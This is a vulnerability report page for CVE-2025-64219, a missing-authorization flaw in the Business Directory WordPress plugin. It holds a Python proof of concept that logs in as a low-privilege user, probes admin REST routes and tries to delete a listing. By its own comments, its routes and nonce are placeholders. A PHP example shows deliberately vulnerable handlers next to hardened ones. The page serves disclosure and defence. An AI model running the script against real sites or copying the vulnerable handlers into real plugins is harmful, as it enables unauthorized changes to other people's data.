Security Vulnerability Report
CVE-2025-64219 CVSS 4.3 MEDIUM

CVE-2025-64219

Published: 2025-10-29 09:15:43
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization (CWE-862) vulnerability in Strategy11 Team Business Directory (business-directory-plugin) allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Business Directory: from n/a through 6.4.18 (fixed in 6.4.19).

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
(PR:L with C:N/I:L/A:N: an authenticated low-privilege account, over the network and without user interaction, can make a limited integrity change; no data disclosure or availability impact is scored.)

Configurations (Affected Products)

No NVD CPE configuration data available (vulnStatus: Deferred). Affected range as listed by the advisory:

business-directory-plugin < 6.4.19 (vulnerable)
Business Directory (all versions) <= 6.4.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64219 PoC - Business Directory Plugin Broken Access Control
# Affected: business-directory-plugin <= 6.4.18
# Type: Missing Authorization (CWE-862)
#
# Caveat: the REST routes and the nonce value below are placeholders carried
# over from the original PoC. The referenced advisory does not publish the
# vulnerable route, so the endpoint list must be adapted to the plugin's
# actual handlers before this script proves anything.
import sys

import requests

TARGET_URL = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "https://vulnerable-site.com"
WP_API_ENDPOINT = f"{TARGET_URL}/wp-json/business-directory/v1"


def exploit_broken_access_control():
    """
    Demonstrates the broken access control vulnerability: a low-privilege
    user (Subscriber role) reaches functions that should require admin rights.
    """
    # Step 1: authenticate as the low-privilege user (Subscriber)
    session = requests.Session()
    login_data = {
        'log': 'attacker_username',
        'pwd': 'attacker_password',
        'wp-submit': 'Log In',
    }
    login_url = f"{TARGET_URL}/wp-login.php"
    session.post(login_url, data=login_data)

    # WordPress sets a wordpress_logged_in_* cookie on success; bail out
    # early rather than reading anonymous 401/403 responses as "access denied".
    if not any(c.name.startswith('wordpress_logged_in_') for c in session.cookies):
        print("[-] Login failed; check credentials")
        return

    # Step 2: exploit the missing authorization by requesting admin-only
    # endpoints (placeholder paths) without holding the admin capability
    exploit_endpoints = [
        f"{WP_API_ENDPOINT}/admin/listings",
        f"{WP_API_ENDPOINT}/admin/categories",
        f"{WP_API_ENDPOINT}/admin/settings",
        f"{WP_API_ENDPOINT}/admin/users",
    ]
    for endpoint in exploit_endpoints:
        response = session.get(endpoint)
        if response.status_code == 200:
            print(f"[+] Successfully accessed: {endpoint}")
            print(f"    Response: {response.text[:200]}...")
        elif response.status_code == 403:
            print(f"[-] Access denied: {endpoint}")
        else:
            print(f"[*] Unexpected response: {response.status_code}")

    # Step 3: modify data without proper authorization (placeholder route,
    # listing id and nonce value, as in the original PoC)
    modify_data = {
        'listing_id': 'any_listing_id',
        'action': 'delete',
        '_wpnonce': 'bypass_nonce_check',
    }
    modify_url = f"{WP_API_ENDPOINT}/admin/listing/modify"
    response = session.post(modify_url, data=modify_data)
    if response.status_code in (200, 201):
        print("[+] Successfully modified data without proper authorization!")


if __name__ == "__main__":
    print("CVE-2025-64219 PoC - Business Directory Broken Access Control")
    print("=" * 60)
    exploit_broken_access_control()
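How the CWE-862 pattern named in the description typically looks inside a WordPress plugin, and why the `_wpnonce` field in the PoC above is not itself an authorization control: the following is an added, illustrative example, not code from Business Directory (the page does not publish the plugin's vulnerable routine). The hook names, the `bd-demo/v1` route, and the assumption that a listing is a post guarded by the `delete_post` meta capability are all hypothetical.

```php
<?php
/**
 * Illustrative CWE-862 (missing authorization) pattern for a WordPress plugin.
 * Added example; NOT code from the Business Directory plugin. Hook names,
 * the route namespace and the listing-is-a-post assumption are hypothetical.
 */

// --- Vulnerable pattern: any logged-in user can delete a listing -------------
add_action( 'wp_ajax_bd_demo_delete_listing', 'bd_demo_delete_listing_vulnerable' );
function bd_demo_delete_listing_vulnerable() {
    // A nonce only proves the request came from a page this site served to the
    // current user; a Subscriber can obtain one from the normal UI. It is CSRF
    // protection, not authorization, so this handler is still CWE-862.
    check_ajax_referer( 'bd_demo_delete', '_wpnonce' );

    $listing_id = absint( $_POST['listing_id'] ?? 0 );
    wp_delete_post( $listing_id, true ); // no capability check before the write
    wp_send_json_success( array( 'deleted' => $listing_id ) );
}

// --- Hardened pattern: same handler with an explicit capability check --------
add_action( 'wp_ajax_bd_demo_delete_listing_fixed', 'bd_demo_delete_listing_fixed' );
function bd_demo_delete_listing_fixed() {
    check_ajax_referer( 'bd_demo_delete', '_wpnonce' );

    $listing_id = absint( $_POST['listing_id'] ?? 0 );

    // Check the capability for the specific object, not merely "logged in".
    // wp_send_json_error() terminates the request, so nothing below runs on 403.
    if ( ! $listing_id || ! current_user_can( 'delete_post', $listing_id ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    wp_delete_post( $listing_id, true );
    wp_send_json_success( array( 'deleted' => $listing_id ) );
}

// --- The same two states for a REST route ------------------------------------
add_action( 'rest_api_init', function () {
    // Vulnerable: WordPress (5.5+) warns when permission_callback is missing,
    // but '__return_true' silences the warning while still admitting every
    // caller, authenticated or not.
    register_rest_route( 'bd-demo/v1', '/listing/(?P<id>\d+)', array(
        'methods'             => 'DELETE',
        'callback'            => 'bd_demo_rest_delete',
        'permission_callback' => '__return_true',
    ) );

    // Hardened: permission_callback enforces the capability for that object.
    register_rest_route( 'bd-demo/v1', '/listing-fixed/(?P<id>\d+)', array(
        'methods'             => 'DELETE',
        'callback'            => 'bd_demo_rest_delete',
        'permission_callback' => function ( WP_REST_Request $request ) {
            $id = (int) $request['id'];
            if ( ! current_user_can( 'delete_post', $id ) ) {
                return new WP_Error(
                    'rest_forbidden',
                    'Insufficient capability.',
                    array( 'status' => 403 )
                );
            }
            return true;
        },
    ) );
} );

function bd_demo_rest_delete( WP_REST_Request $request ) {
    $id = (int) $request['id'];
    wp_delete_post( $id, true );
    return rest_ensure_response( array( 'deleted' => $id ) );
}
```

To verify a fix for this class, authenticate as a Subscriber, obtain a valid nonce through the normal UI, and replay the request: the hardened handlers must answer 403 regardless of the nonce. Note that `admin-ajax.php` dispatches `wp_ajax_*` hooks only for logged-in users, which matches the PR:L in the vector; it is the missing capability check, not the login gate, that the CVE is about.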

References

https://patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-18-broken-access-control-vulnerability?_s_id=cve (Patchstack advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64219", "sourceIdentifier": "[email protected]", "published": "2025-10-29T09:15:42.867", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Business Directory: from n/a through <= 6.4.18."}, {"lang": "es", "value": "Vulnerabilidad de falta de autorización en el plugin de directorio de negocios Strategy11 Team Business Directory permite la explotación de niveles de seguridad de control de acceso mal configurados. Este problema afecta a Business Directory: desde n/a hasta menor igual que 6.4.18."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-18-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}